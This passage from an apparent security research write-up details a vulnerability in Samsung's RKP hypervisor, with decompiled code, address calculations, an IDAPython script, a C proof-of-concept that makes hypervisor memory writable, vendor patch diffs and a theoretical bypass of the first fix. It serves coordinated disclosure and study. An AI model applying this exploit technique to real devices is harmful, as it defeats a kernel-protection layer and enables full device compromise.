next_end_addr = end_addr;
}
table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
// If the descriptor is a page descriptor, set its AP bits to RO and unset its PXN bit.
if ((*table_desc_p & 3) == 3) {
set_rox_bits_of_desc(table_desc_p, 3);
}
}
rkp_phys_map_unlock(table);
return 0;
}
rkp_set_range_to_rox
is also always called (from the "dynamic load" feature's functions) on swapper_pg_dir
. It will thus walk the kernel page tables (stage 1) and change the memory attributes of the block and page descriptor spanning over the specified address range to make them read-only executable. The call to rkp_s2_page_change_permission
that we are interested in also only happens for level 3 tables, but only if they are not marked KERNEL|L3
in the physmap
.
It is not a good option either for us for similar reasons: the target page is set as read-only in the stage 2, it requires having already written a user-controlled descriptor into the kernel page tables, and the "dynamic load" feature is only present on Exynos devices.
The last 2 functions that call rkp_s2_page_change_permission
are rkp_set_pages_ro
and rkp_ro_free_pages
, which we have seen in the first blog post. Unfortunately, they give it as an argument an address that comes from a call to rkp_get_pa
, so they are unusable for our exploit.
Finally, rkp_s2_range_change_permission
, the function operating on an address range, is called from many dynamic_load_xxx
functions, but the "dynamic load" feature is only available on Exynos devices, and we would like to keep the exploit as generic as possible.
To exploit the vulnerability, we decided to use rkp_l1pgt_new_pgd
and rkp_l1pgt_free_pgd
. As mentioned previously, because these functions call rkp_l1pgt_process_table
with a physical address returned by rkp_get_pa
, we will be targeting the rkp_s2_page_change_permission
call in rkp_l2pgt_process_table
instead. To reach it, we need to give a "fake PGD" that contains a single descriptor pointing to a "fake PMD" (that will be overlapping with our target page in hypervisor memory) as input to the rkp_l1pgt_process_table
function.
+------------------+ .-> +------------------+
| | | | |
+------------------+ | +------------------+
| table descriptor ---' | |
+------------------+ +------------------+
| | | |
+------------------+ +------------------+
| | | |
+------------------+ +------------------+
"fake PMD" "fake PUD"
in kernel memory in hypervisor memory
The first step of the exploit is to call the rkp_cmd_new_pgd
command handler, which simply calls rkp_l1pgt_new_pgd
. It itself calls rkp_l1pgt_process_table
, which will process our "fake PGD" (in the code below, high_bits
will be 0 and is_alloc
will be 1). More specifically, it will set our "fake PGD" as L1 in the physmap, set it as read-only in the stage 2, then call rkp_l2pgt_process_table to process our "fake PMD".
int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
// ...
rkp_phys_map_lock(pgd);
// If we are introducing this PGD.
if (is_alloc) {
// If it is already marked as a PGD in the physmap, return without processing it.
if (is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
// ...
// And mark the PGD as such in the physmap.
res = rkp_phys_map_set(pgd, type /* L1 */);
// ...
// Make the PGD read-only in the second stage.
res = rkp_s2_page_change_permission(pgd, 0x80 /* read-only */, 0 /* non-executable */, 0);
// ...
}
// ...
// Now iterate over each descriptor of the PGD.
do {
// ...
// Block descriptor (not a table, not invalid).
if ((desc & 0b11) != 0b11) {
if (desc) {
// Make the memory non executable at EL1.
set_pxn_bit_of_desc(desc_p, 1);
}
}
// Table descriptor.
else {
addr = start_addr & 0xffffff803fffffff | offset;
// Call rkp_l2pgt_process_table to process the PMD.
res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
// ...
// Make the memory non executable at EL1 for user PGDs.
set_pxn_bit_of_desc(desc_p, 1);
}
// ...
} while (entry != 0x1000);
rkp_phys_map_unlock(pgd);
return res;
}
rkp_l2pgt_process_table then processes our "fake PMD": it marks it as L2 in the physmap, sets it as read-only in the stage 2 page tables, then calls check_single_l2e on each of its entries (which we don't have control over).
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
// ...
rkp_phys_map_lock(pmd);
// If we are introducing this PMD.
if (is_alloc) {
// If it is already marked as a PMD in the physmap, return without processing it.
if (is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pmd);
return 0;
}
// ...
// And mark the PMD as such in the physmap.
res = rkp_phys_map_set(pmd, type /* L2 */);
// ...
// Make the PMD read-only in the second stage.
res = rkp_s2_page_change_permission(pmd, 0x80 /* read-only */, 0 /* non-executable */, 0);
// ...
}
// ...
// Now iterate over each descriptor of the PMD.
offset = 0;
for (i = 0; i != 0x1000; i += 8) {
addr = offset | start_addr & 0xffffffffc01fffff;
// Call `check_single_l2e` on each descriptor.
res += check_single_l2e(pmd + i, addr, is_alloc);
offset += 0x200000;
}
rkp_phys_map_unlock(pmd);
return res;
}
check_single_l2e
will set the PXN bit of the descriptor (which in our case is each 8-byte value in our target page) and will also process values that look like table descriptors. That's something we will need to keep in mind when choosing our target page in hypervisor memory.
int64_t check_single_l2e(int64_t* desc_p, uint64_t start_addr, signed int32_t is_alloc) {
// ...
// The virtual address is not executable, set the PXN bit of the descriptor.
set_pxn_bit_of_desc(desc_p, 2);
// ...
// Get the descriptor type.
desc = *desc_p;
type = *desc & 0b11;
// Block descriptor, return without processing it.
if (type == 0b01) {
return 0;
}
// Invalid descriptor, return without processing it.
if (type != 0b11) {
if (desc) {
uh_log('L', "rkp_l2pgt.c", 64, "Invalid l2e %p %p %p", desc, is_alloc, desc_p);
}
return 0;
}
// ...
// Call rkp_l3pgt_process_table to process the PT.
return rkp_l3pgt_process_table(*desc_p & 0xfffffffff000, start_addr, is_alloc, protect);
}
Up to this point, we have gotten our target page marked as L2
in the physmap
, and remapped as read-only in the stage 2 page tables. That's great, but to be able to modify it from the kernel, we need to have it mapped as writable in the second stage.
The second step of the exploit is to call the rkp_cmd_free_pgd
command handler, which simply calls rkp_l1pgt_free_pgd
. It itself calls rkp_l1pgt_process_table
, which once again will process our "fake PGD" (in the code below, high_bits
will be 0 and is_alloc
will this time be 0). More specifically, it will set our "fake PGD" as FREE
in the physmap
, set it as read-write in the stage 2, then call rkp_l2pgt_process_table
to process our "fake PMD".
int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
// ...
rkp_phys_map_lock(pgd);
// ...
// If we are retiring this PGD.
if (!is_alloc) {
// If it is not marked as a PGD in the physmap, return without processing it.
if (!is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
// Mark the PGD as `FREE` in the physmap.
res = rkp_phys_map_set(pgd, FREE);
// ...
// Make the PGD writable in the second stage.
res = rkp_s2_page_change_permission(pgd, 0 /* writable */, 1 /* executable */, 0);
// ...
}
// Now iterate over each descriptor of the PGD.
offset = 0;
entry = 0;
start_addr = high_bits << 39;
do {
// Block descriptor (not a table, not invalid).
if ((desc & 0b11) != 0b11) {
if (desc) {
// Make the memory non executable at EL1.
set_pxn_bit_of_desc(desc_p, 1);
}
} else {
addr = start_addr & 0xffffff803fffffff | offset;
// Call rkp_l2pgt_process_table to process the PMD.
res += rkp_l2pgt_process_table(desc & 0xfffffffff000, addr, is_alloc);
// ...
// Make the memory non executable at EL1 for user PGDs.
set_pxn_bit_of_desc(desc_p, 1);
}
// ...
} while (entry != 0x1000);
rkp_phys_map_unlock(pgd);
return res;
}
rkp_l2pgt_process_table then processes our "fake PMD": it marks it as FREE in the physmap, sets it as read-write in the stage 2 page tables, then calls check_single_l2e again on each of its entries (which will do the same as before).
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
// ...
rkp_phys_map_lock(pmd);
// ...
// If we are retiring this PMD.
if (!is_alloc) {
// If it is not marked as a PMD in the physmap, return without processing it.
if (!is_phys_map_l2(pmd)) {
rkp_phys_map_unlock(pmd);
return 0;
}
// ...
// Mark the PMD as `FREE` in the physmap.
res = rkp_phys_map_set(pmd, FREE);
// ...
// Make the PMD writable in the second stage.
res = rkp_s2_page_change_permission(pmd, 0 /* writable */, 1 /* executable */, 0);
// ...
}
// Now iterate over each descriptor of the PMD.
offset = 0;
for (i = 0; i != 0x1000; i += 8) {
addr = offset | start_addr & 0xffffffffc01fffff;
// Call `check_single_l2e` on each descriptor.
res += check_single_l2e(pmd + i, addr, is_alloc);
offset += 0x200000;
}
rkp_phys_map_unlock(pmd);
return res;
}
We have finally gotten our target page remapped as writable in the stage 2 page tables. Perfect, now we need to find a target page that will not make the hypervisor crash when its contents are processed by the check_single_l2e
function.
Because check_single_l2e
sets the PXN bit of the "fake PUD" descriptors (i.e. the content of our target page) and further processes values that look like table descriptors, we cannot directly target pages located in RKP's code segment. Our target must be writable from EL2, which is the case for RKP's page tables (either the stage 2 page tables for EL1 or the page tables for EL2). But by virtue of being page tables, they contain valid descriptors, so they are very likely to make RKP or the kernel crash at some point as the result of this processing. That is why we didn't target them.
Instead, we chose to target the memory page backing the protected_ranges
memlist, which is the page that contains all its memlist_entry_t
instances. It contains values that are always aligned on 8 bytes, so they look like invalid descriptors to the check_single_l2e
function. And by nullifying this list from the kernel, we would then be able to provide addresses inside hypervisor memory to all the command handlers.
This protected_ranges
memlist is allocated in the pa_restrict_init
function:
int64_t pa_restrict_init() {
// Initialize the memlist of protected ranges.
memlist_init(&protected_ranges);
// Add the uH memory region to it (containing the hypervisor code and data).
memlist_add(&protected_ranges, 0x87000000, 0x200000);
// ...
}
To know precisely where the memory backing this memlist will be allocated, we need to dig into the memlist_init
function. It preallocates enough space for 5 entries (the default capacity) by calling the memlist_reserve
function before initializing the structure's fields.
int64_t memlist_init(memlist_t* list) {
// ...
// Reset the structure fields.
memset(list, 0, sizeof(memlist_t));
// By default, preallocate space for 5 entries.
res = memlist_reserve(list, 5);
// Fill the structure fields accordingly.
list->capacity = 5;
list->merged = 0;
list->unkn_14 = 0;
cs_init(&list->cs);
return res;
}
It turns out the protected_ranges
memlist never stores more than 5 memory regions, even with the memory backing the physmap
being added to it. Thus, it never gets reallocated, and there's only ever one allocation made. Now let's see what the memlist_reserve
function does. It allocates space for the specified number of memlist_entry
entries and copies the old entries to the newly allocated memory, if there were any.
int64_t memlist_reserve(memlist_t* list, uint64_t size) {
// ...
// Sanity-check the arguments.
if (!list || !size) {
return -1;
}
// Allocate memory for `size` entries of type `memlist_entry`.
base = heap_alloc(0x20 * size, 0);
if (!base) {
return -1;
}
// Reset the memory that was just allocated.
memset(base, 0, 0x20 * size);
// If the list already contains some entries.
if (list->base) {
// Copy these entries from the old array to the new one.
for (index = 0; index < list->count; ++index) {
new_entry = &base[index];
old_entry = &list->base[index];
new_entry->addr = old_entry->addr;
new_entry->size = old_entry->size;
new_entry->unkn_10 = old_entry->unkn_10;
new_entry->extra = old_entry->extra;
}
// And free the old memory.
heap_free(list->base);
}
list->base = base;
return 0;
}
The memory is allocated by memlist_reserve
by calling heap_alloc
, so it comes from the "static heap" allocator. In pa_restrict_init
, when the allocation for protected_ranges
memlist is made, the "static region" contains:
So we know the address returned by the allocator should be somewhere after 0x87046000
(i.e. between the uH/RKP and "bigdata" regions). To know at which address exactly it will be, we need to find all the allocations that are performed before pa_restrict_init
is called.
By carefully tracing the execution statically, we find 4 "static heap" allocations:

- in rkp_init_cmd_counts;
- in uh_init_bigdata;
- in uh_init_context;
- the memlist_init(&dynamic_regions) call in uh_init.

int64_t uh_init(int64_t uh_base, int64_t uh_size) {
// ...
apps_init();
uh_init_bigdata();
uh_init_context();
memlist_init(&uh_state.dynamic_regions);
pa_restrict_init();
// ...
}
uint64_t apps_init() {
// ...
res = uh_handle_command(i, 0, &saved_regs);
// ...
}
int64_t uh_handle_command(uint64_t app_id, uint64_t cmd_id, saved_regs_t* regs) {
// ...
return cmd_handler(regs);
}
int64_t rkp_cmd_init() {
// ...
rkp_init_cmd_counts();
// ...
}
uint8_t* rkp_init_cmd_counts() {
// ...
malloc(0x8a, 0);
// ...
}
int64_t uh_init_bigdata() {
if (!bigdata_state) {
bigdata_state = malloc(0x230, 0);
}
memset(0x870ffc40, 0, 0x3c0);
memset(bigdata_state, 0, 0x230);
return s1_map(0x870ff000, 0x1000, UNKN3 | WRITE | READ);
}
int64_t* uh_init_context() {
// ...
uh_context = malloc(0x1000, 0);
if (!uh_context) {
uh_log('W', "RKP_1cae4f3b", 21, "%s RKP_148c665c", "uh_init_context");
}
return memset(uh_context, 0, 0x1000);
}
Now we are ready to calculate the address. Each allocation has a header of 0x18 bytes, and the allocator rounds up the total size to the next 8-byte boundary. By doing our math properly, we find that the physical address of the protected_ranges
allocation is 0x870473D8:
>>> f = lambda x: (x + 0x18 + 7) & 0xFFFFFFF8
>>> 0x87046000 + f(0x8A) + f(0x230) + f(0x1000) + f(0xA0) + 0x18
0x870473D8
We also need to know what's in the same page (0x87047000) as the protected_ranges
memlist. Thanks to our tracing of the prior allocations, we know that it is preceded by the uh_context
, which is memset
and only used on panics. Similarly, we can determine that it is followed by a memlist reallocation in init_cmd_add_dynamic_region
and a stage 2 page table allocation in init_cmd_initialize_dynamic_heap
with a page-sized padding. This means that there should be no value looking like a page table descriptor in this page (on our test device).
After making the page containing the protected_ranges
memlist writable in the stage 2 using the rkp_cmd_new_pgd
and rkp_cmd_free_pgd
commands, we directly modify it from the kernel. Our goal is to make check_kernel_input
always return 0 so that we can give arbitrary addresses (including addresses in hypervisor memory) to all command handlers. check_kernel_input
calls protected_ranges_contains
, which itself calls memlist_contains_addr
. This function simply checks if the address is within any of the regions of the memlist.
int64_t memlist_contains_addr(memlist_t* list, uint64_t addr) {
// ...
cs_enter(&list->cs);
// Iterate over each of the entries of the memlist.
for (index = 0; index < list->count; ++index) {
entry = &list->base[index];
// If the address is within the start address and end address of the region.
if (addr >= entry->addr && addr < entry->addr + entry->size) {
cs_exit(&list->cs);
return 1;
}
}
cs_exit(&list->cs);
return 0;
}
The first entry in protected_ranges
is the hypervisor memory region. Zeroing its size
field (at offset 8) should be enough to disable the blacklist.
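As a quick sanity check, here is the containment test from memlist_contains_addr applied to the first protected_ranges entry before and after zeroing its size field (the concrete values are the ones from our test device):

/* Containment check performed by memlist_contains_addr for a single entry. */
int entry_contains(uint64_t entry_addr, uint64_t entry_size, uint64_t addr) {
    return addr >= entry_addr && addr < entry_addr + entry_size;
}

/* entry_contains(0x87000000, 0x200000, 0x87047000) -> 1 (hypervisor address rejected)
 * entry_contains(0x87000000, 0x0,      0x87047000) -> 0 (hypervisor address accepted) */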
The final step to fully compromise the hypervisor is to get arbitrary code execution, which is fairly easy now that we can give any address to all command handlers. This can be achieved in multiple ways, but the simplest way is likely to modify the page tables of the stage 2 at EL1.
For example, we can target the level 2 descriptor that covers the memory range of the hypervisor and turn it into a writable block descriptor. The write itself can be performed by calling rkp_cmd_write_pgt3
(that calls rkp_l3pgt_write
) since we have disabled the protected_ranges
memlist.
To find the physical address of the target descriptor, we can dump the initial stage 2 page tables at EL1 using an IDAPython script:
import ida_bytes

def parse_static_s2_page_tables(table, level=1, start_vaddr=0):
    size = [0x8000000000, 0x40000000, 0x200000, 0x1000][level]
    for i in range(512):
        desc_addr = table + i * 8
        desc = ida_bytes.get_qword(desc_addr)
        if (desc & 0b11) == 0b00 or (desc & 0b11) == 0b01:
            continue
        paddr = desc & 0xFFFFFFFFF000
        vaddr = start_vaddr + i * size
        if level < 3 and (desc & 0b11) == 0b11:
            print("L%d Table for %016x-%016x is at %08x" \
                % (level + 1, vaddr, vaddr + size, paddr))
            parse_static_s2_page_tables(paddr, level + 1, vaddr)

parse_static_s2_page_tables(0x87028000)
Below is the result of running this script on the binary running on our target device.
L2 Table for 0000000000000000-0000000040000000 is at 87032000
L3 Table for 0000000002000000-0000000002200000 is at 87033000
L2 Table for 0000000080000000-00000000c0000000 is at 8702a000
L2 Table for 00000000c0000000-0000000100000000 is at 8702b000
L2 Table for 0000000880000000-00000008c0000000 is at 8702c000
L2 Table for 00000008c0000000-0000000900000000 is at 8702d000
L2 Table for 0000000900000000-0000000940000000 is at 8702e000
L2 Table for 0000000940000000-0000000980000000 is at 8702f000
L2 Table for 0000000980000000-00000009c0000000 is at 87030000
L2 Table for 00000009c0000000-0000000a00000000 is at 87031000
We know that the L2 table that maps 0x80000000-0xc0000000 is located at 0x8702A000. To obtain the descriptor's address, which depends on the target address (0x87000000) and the size of a L2 block (0x200000), we simply need to add an offset to the address of the L2 table:
>>> 0x8702A000 + ((0x87000000 - 0x80000000) // 0x200000) * 8
0x8702A1C0
The descriptor's value is composed of the target address and the wanted attributes: 0x87000000 | 0x4FD = 0x870004FD
.
0 1 00 11 1111 01 = 0x4FD
^ ^ ^ ^ ^ ^
| | | | | `-- Type: block descriptor
| | | | `------- MemAttr[3:0]: NM, OWBC, IWBC
| | | `---------- S2AP[1:0]: read/write
| | `------------- SH[1:0]: NS
| `--------------- AF: 1
`----------------- FnXS: 0
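The same value can be rebuilt programmatically; here is a small sketch following the field breakdown above (since 0x87000000 is 2 MB-aligned, OR-ing the attributes into the low bits does not disturb the output address):

/* Rebuild the stage 2 block descriptor value used above (sketch). */
uint64_t make_s2_rw_block_desc(uint64_t block_pa) {
    uint64_t attrs = 0b01               /* type: block descriptor       */
                   | (0b1111 << 2)      /* MemAttr[3:0]                 */
                   | (0b11 << 6)        /* S2AP[1:0]: read/write        */
                   | (0b00 << 8)        /* SH[1:0]: non-shareable       */
                   | (1 << 10);         /* AF: access flag              */
    return block_pa | attrs;            /* 0x87000000 | 0x4FD = 0x870004FD */
}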
The descriptor is changed by calling rkp_cmd_write_pgt3
, which calls rkp_l3pgt_write
. Since we are writing to an existing page table that is marked as L3
in the physmap
and the new value is a block descriptor, the check passes, and the write is performed in set_entry_of_pgt
.
int64_t* rkp_l3pgt_write(uint64_t ptep, int64_t pte_val) {
// ...
// Convert the PT descriptor VA into a PA.
ptep_pa = rkp_get_pa(ptep);
rkp_phys_map_lock(ptep_pa);
// If the PT is marked as such in the physmap, or as `FREE`.
if (is_phys_map_l3(ptep_pa) || is_phys_map_free(ptep_pa)) {
// If the new descriptor is not a page descriptor, or its PXN bit is set, the check passes.
if ((pte_val & 0b11) != 0b11 || get_pxn_bit_of_desc(pte_val, 3)) {
allowed = 1;
}
// Otherwise, the check fails if RKP is deferred initialized.
else {
allowed = rkp_deferred_inited == 0;
}
}
// If the PT is marked as something else, the check also fails.
else {
allowed = 0;
}
rkp_phys_map_unlock(ptep_pa);
// If the check failed, trigger a policy violation.
if (!allowed) {
pxn_bit = get_pxn_bit_of_desc(pte_val, 3);
return rkp_policy_violation("Write L3 to wrong page type, %lx, %lx, %x", ptep_pa, pte_val, pxn_bit);
}
// Otherwise, perform the write of the PT descriptor on behalf of the kernel.
return set_entry_of_pgt(ptep_pa, pte_val);
}
uint64_t* set_entry_of_pgt(uint64_t* ptr, uint64_t val) {
*ptr = val;
return ptr;
}
This simple proof of concept assumes that we have obtained kernel memory read/write primitives and can make hypervisor calls.
#define UH_APP_RKP 0xC300C002
#define RKP_CMD_NEW_PGD 0x0A
#define RKP_CMD_FREE_PGD 0x09
#define RKP_CMD_WRITE_PGT3 0x05
#define PROTECTED_RANGES_BITMAP 0x870473D8
#define BLOCK_DESC_ADDR 0x8702A1C0
#define BLOCK_DESC_DATA 0x870004FD
uint64_t pa_to_va(uint64_t pa) {
return pa - 0x80000000UL + 0xFFFFFFC000000000UL;
}
void exploit() {
/* allocate and clear our "fake PGD" */
uint64_t pgd = kernel_alloc(0x1000);
for (uint64_t i = 0; i < 0x1000; i += 8)
kernel_write(pgd + i, 0UL);
/* write our "fake PMD" descriptor */
kernel_write(pgd, (PROTECTED_RANGES_BITMAP & 0xFFFFFFFFF000UL) | 3UL);
/* make the hyp call that will set the page RO */
kernel_hyp_call(UH_APP_RKP, RKP_CMD_NEW_PGD, pgd);
/* make the hyp call that will set the page RW */
kernel_hyp_call(UH_APP_RKP, RKP_CMD_FREE_PGD, pgd);
/* zero out the "protected ranges" first entry */
kernel_write(pa_to_va(PROTECTED_RANGES_BITMAP + 8), 0UL);
/* write the descriptor to make hyp memory writable */
kernel_hyp_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3,
pa_to_va(BLOCK_DESC_ADDR), BLOCK_DESC_DATA);
}
The exploit was successfully tested on the most recent firmware available for our test device (at the time we reported this vulnerability to Samsung): A515FXXU4CTJ1
. The two-fold bug appeared to be present in the binaries of both Exynos and Snapdragon devices, including the S10/S10+/S20/S20+ flagship devices. However, its exploitability on these devices is uncertain.
The prerequisites for exploiting this vulnerability are high: being able to make hypervisor calls with only an arbitrary read and write of kernel memory is no small feat on devices where JOPP/ROPP are enabled. In particular, on Snapdragon devices, the s2_map
function (called from rkp_s2_page_change_permission
and rkp_s2_range_change_permission
) makes an indirect call to a QHEE function (since it is QHEE that is in charge of the stage 2 page tables). We did not follow this call to see if it made any additional checks that could prevent the exploitation of this vulnerability. On the Galaxy S20, there is also an indirect call to the new hypervisor framework (called H-Arx), which we did not follow either.
The memory layout will also be different on other devices than the one we have targeted in the exploit, so the hard-coded addresses won't work. But we believe that they can be adapted or that an alternative exploitation strategy can be found for these devices.
Here are the immediate remediation steps we suggested to Samsung:
- Mark the pages unmapped by s2_unmap as S2UNMAP in the physmap
- Perform the additional checks of rkp_s2_page_change_permission in
rkp_s2_range_change_permission as well
- Add calls to check_kernel_input in the rkp_lxpgt_process_table functions
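To illustrate the first suggestion, here is one possible shape of the fix, as a sketch only: record the unmapping in the physmap when s2_unmap succeeds, so that the existing is_phys_map_s2unmap check in rkp_s2_page_change_permission becomes meaningful. We are assuming that rkp_phys_map_set_region takes an address, a size, and a type; its actual signature isn't shown in this post.

/* Sketch of the first remediation (not Samsung's actual patch). */
int64_t s2_unmap_and_mark(uint64_t orig_addr, uint64_t orig_size) {
    uint64_t addr = orig_addr & ~0xfffull;
    uint64_t size = ((orig_addr & 0xfff) + orig_size + 0xfff) & ~0xfffull;
    if (s2_unmap(orig_addr, orig_size) < 0)
        return -1;
    /* Mark every unmapped page as S2UNMAP so later permission changes refuse it. */
    return rkp_phys_map_set_region(addr, size, S2UNMAP);
}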
After being notified by Samsung that the vulnerability had been patched, we downloaded the latest firmware update for our test device, the Samsung Galaxy A51. But we quickly noticed it hadn't been updated to the June patch level yet, so we had to do our binary diffing on the latest firmware update for the Samsung Galaxy S10 instead. The exact version used was G973FXXSBFUF3
.
The first changes were made to the rkp_s2_page_change_permission
function. It now takes a type
argument that it will use to mark the page in the physmap
, regardless of whether the checks pass or fail. In addition, for read-only permissions, the changes to the physmap
and ro_bitmap
are made prior to changing the stage 2 page tables, and after for read-write permissions.
int64_t rkp_s2_page_change_permission(void* p_addr,
uint64_t access,
+ uint32_t type,
uint32_t exec,
uint32_t allow) {
// ...
if (!allow && !rkp_inited) {
// ...
- return -1;
+ return rkp_phys_map_set(p_addr, type) ? -1 : 0;
}
if (is_phys_map_s2unmap(p_addr)) {
// ...
- return -1;
+ return rkp_phys_map_set(p_addr, type) ? -1 : 0;
}
if (page_allocator_is_allocated(p_addr) == 1
|| (p_addr >= TEXT_PA && p_addr < ETEXT_PA)
|| (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA)))
- return 0;
+ return rkp_phys_map_set(p_addr, type) ? -1 : 0;
// ...
+ if (access == 0x80) {
+ if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+ return -1;
+ }
if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
return -1;
}
tlbivaae1is(((p_addr + 0x80000000) | 0xFFFFFFC000000000) >> 12);
- return rkp_set_pgt_bitmap(p_addr, access);
+ if (access != 0x80)
+ if (rkp_phys_map_set(p_addr, type) || rkp_set_pgt_bitmap(p_addr, access))
+ return -1;
+ return 0;
}
Surprisingly, no changes were made to the rkp_s2_range_change_permission
function. So far, none of the changes prevent using these two functions to remap previously unmapped memory.
The second set of changes were to the rkp_l1pgt_process_table
, rkp_l2pgt_process_table
, and rkp_l3pgt_process_table
functions. In each of these functions, a call to check_kernel_input
has been added in the allocation path before changing the stage 2 permissions of the page.
int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
// ...
if (is_alloc) {
+ check_kernel_input(pgd);
// ...
} else {
// ...
}
// ...
}
int64_t rkp_l2pgt_process_table(int64_t pmd, uint64_t start_addr, uint32_t is_alloc) {
// ...
if (is_alloc) {
+ check_kernel_input(pmd);
// ...
} else {
// ...
}
}
int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
// ...
if (is_alloc) {
+ check_kernel_input(pte);
// ...
} else {
// ...
}
// ...
}
These changes make it so that we can no longer use the specific code path implemented in our exploit to call rkp_s2_page_change_permission
. However, they don't prevent any of the other ways to call this function that we presented earlier.
We were unable to find a change that fixes the actual issue, which is that pages unmapped in the stage 2 are not marked as S2UNMAP
in the physmap
. To demonstrate to Samsung that their fix was not sufficient, we started looking for a new exploitation strategy. While we were, unfortunately, unable to test it on a real device due to a lack of time, we devised the theoretical approach explained below.
In the Exploring Our Options section, we mentioned that the set_range_to_rox_l3
and set_range_to_pxn_l3
functions can be used to reach a call to rkp_s2_page_change_permission
, but with two major caveats. First, to call them on our target page, we need a table descriptor in a kernel PMD to point to it. Second, they are part of the "dynamic load" feature, which is only available on Exynos devices.
However, if we are able to call these functions, we can easily make our target page writable in the second stage. We can first call set_range_to_rox_l3
to mark our target page KERNEL|L3
in the physmap
but also make it read-only in the second stage. We can then call set_range_to_pxn_l3
, which requires it to be marked KERNEL|L3
in physmap
but also makes it writable in the second stage.
Our new strategy requires our target page to be pointed to by a table descriptor of a kernel PMD. This can be accomplished by changing an invalid descriptor into a table descriptor pointing to a "fake PT" that is actually our target page of hypervisor memory, as illustrated below.
|
+--------------------+ | +--------------------+ .-> +--------------------+
| | | | | | | |
+--------------------+ | +--------------------+ | +--------------------+
| invalid descriptor | | | table descriptor ---' | |
+--------------------+ | +--------------------+ +--------------------+
| | | | | | |
+--------------------+ | +--------------------+ +--------------------+
| | | | | | |
+--------------------+ | +--------------------+ +--------------------+
|
read PMD | read PMD "fake PT"
in kernel memory | in kernel memory in hypervisor memory
Let's call the PA of the PMD descriptor pmd_desc_pa
, the start VA of the region that it maps start_va
, and the PA of our target page target_pa
. To change the descriptor's value (from 0 to target_pa | 3
), we can invoke the rkp_cmd_write_pgt2
command that calls rkp_l2pgt_write
.
In rkp_l2pgt_write
, since we are writing to an existing kernel PMD that is already marked as KERNEL|L2
in the physmap
, the first check passes. And because the descriptor value changes from a zero to a non-zero value, it only calls check_single_l2e
once, with the new descriptor value.
In check_single_l2e
, by choosing a start_va
not contained in the executable_regions
, the PXN bit of the new descriptor value is set and protect
is set to false. Then, because the new descriptor is a table, rkp_l3pgt_process_table
is called.
In rkp_l3pgt_process_table
, because protect
is false, the function returns early.
Finally, back in rkp_l2pgt_write
, the new value of the descriptor is written.
We are now ready to call the set_range_to_rox_l3
and set_range_to_pxn_l3
functions using the "dynamic load" commands that we will explain in the section about the next vulnerability. In particular, we use the subcommands dynamic_load_ins
and dynamic_load_rm
.
For reference, the code path that needs to be taken is as follows:
rkp_cmd_dynamic_load
`-- dynamic_load_ins
|-- dynamic_load_check
| code range must be in the binary range
| must not overlap another "dynamic executable"
| must not be in the ro_bitmap
|-- dynamic_load_protection
| will make the code range as RO (and add it to ro_bitmap)
|-- dynamic_load_verify_signing
| if type != 3, no signature checking
|-- dynamic_load_make_rox
| calls rkp_set_range_to_rox!
|-- dynamic_load_add_executable
| code range added to the executable_regions
`-- dynamic_load_add_dynlist
code range added to the dynamic_load_regions
rkp_cmd_dynamic_load
`-- dynamic_load_rm
|-- dynamic_load_rm_dynlist
| code range is removed from dynamic_load_regions
|-- dynamic_load_rm_executable
| code range is removed from executable_regions
|-- dynamic_load_set_pxn
| calls rkp_set_range_to_pxn!
`-- dynamic_load_rw
will make the code range as RW (and remove it from ro_bitmap)
It should be noted that, similarly to the original exploitation path, values in the target page that look like valid page table descriptors will have their PXN bit set, which also means that the target page must be writable by the hypervisor. Nevertheless, we can continue to target the memory backing the protected_ranges
bitmap.
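As a rough illustration of the first step of this strategy, here is how the descriptor write could look, reusing the helpers from our first exploit (the RKP_CMD_WRITE_PGT2 constant mirrors the RKP_CMD_WRITE_PGT3 one used earlier). The pmd_desc_pa and target_pa values are device-specific placeholders, and we have not tested this sketch end to end; the subsequent calls would then go through the dynamic_load_ins and dynamic_load_rm code paths listed above.
/* Untested sketch: turn an invalid kernel PMD descriptor into a table
 * descriptor pointing to our target page of hypervisor memory (the "fake PT").
 * The VA range mapped by this descriptor must not be in the executable_regions
 * memlist, so that check_single_l2e only sets the PXN bit of the new value. */
void write_fake_table_descriptor(uint64_t pmd_desc_pa, uint64_t target_pa) {
  /* rkp_l2pgt_write is reached through the rkp_cmd_write_pgt2 command and
   * takes the descriptor's VA and the new descriptor value (a table
   * descriptor, hence the low bits set to 0b11). */
  kernel_hyp_call(UH_APP_RKP, RKP_CMD_WRITE_PGT2,
                  pa_to_va(pmd_desc_pa), target_pa | 3);
}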
After being notified a second time by Samsung that the vulnerability was patched, we downloaded and binary diffed the most recent firmware update available for the Samsung Galaxy S10. The exact version used was G973FXXSEFUJ2
.
Changes were made to the rkp_s2_page_change_permission
function. It now calls check_kernel_input
to ensure the physical address of the page is not in the protected_ranges
memlist. This prevents targeting hypervisor memory with this function.
int64_t rkp_s2_page_change_permission(void* p_addr,
uint64_t access,
- uint32_t exec,
- uint32_t allow) {
+ uint32_t exec) {
// ...
- if (!allow && !rkp_inited) {
+ if (!rkp_deferred_inited) {
// ...
}
+ check_kernel_input(p_addr);
// ...
}
This time, changes were also made to rkp_s2_range_change_permission
. First, it calls protected_ranges_overlaps
to ensure that the range does not overlap with the protected_ranges
memlist. It then also ensures that none of the target pages are marked as S2UNMAP
in the physmap
.
int64_t rkp_s2_range_change_permission(uint64_t start_addr,
uint64_t end_addr,
uint64_t access,
uint32_t exec,
uint32_t allow) {
// ...
- if (!allow && !rkp_inited) {
